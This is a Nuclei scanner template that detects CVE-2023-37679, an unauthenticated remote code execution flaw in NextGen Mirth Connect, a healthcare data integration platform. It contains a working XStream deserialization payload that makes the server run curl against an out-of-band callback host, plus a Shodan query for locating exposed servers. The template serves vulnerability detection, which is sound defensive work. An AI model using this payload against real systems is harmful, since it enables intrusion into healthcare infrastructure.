nuclei-templates/http/cves/2023/CVE-2023-37679.yaml

id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability    
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.08527
    epss-percentile: 0.93766
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query: title:"mirth connect administrator"
  tags: cve,cve2023,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI        
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        <sorted-set>
            <string>foo</string>
            <dynamic-proxy>
                <interface>java.lang.Comparable</interface>
                <handler class="java.beans.EventHandler">
                    <target class="java.lang.ProcessBuilder">
                        <command>
                            <string>curl</string>
                            <string>http://{{interactsh-url}}/</string>
                        </command>
                    </target>
                    <action>start</action>
                </handler>
            </dynamic-proxy>
        </sorted-set>        

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true

# digest: 490a0046304402207d6618fcf6ead2bf834db240d438b64a0de510c5cb70ef7367b6b954ab35c8b702205b15b9ade7c4968b9a2d2f350a287cf7ddcd1395b9d330d583004a7d2e2f4866:922c64590222798bb761d5b6d8e72950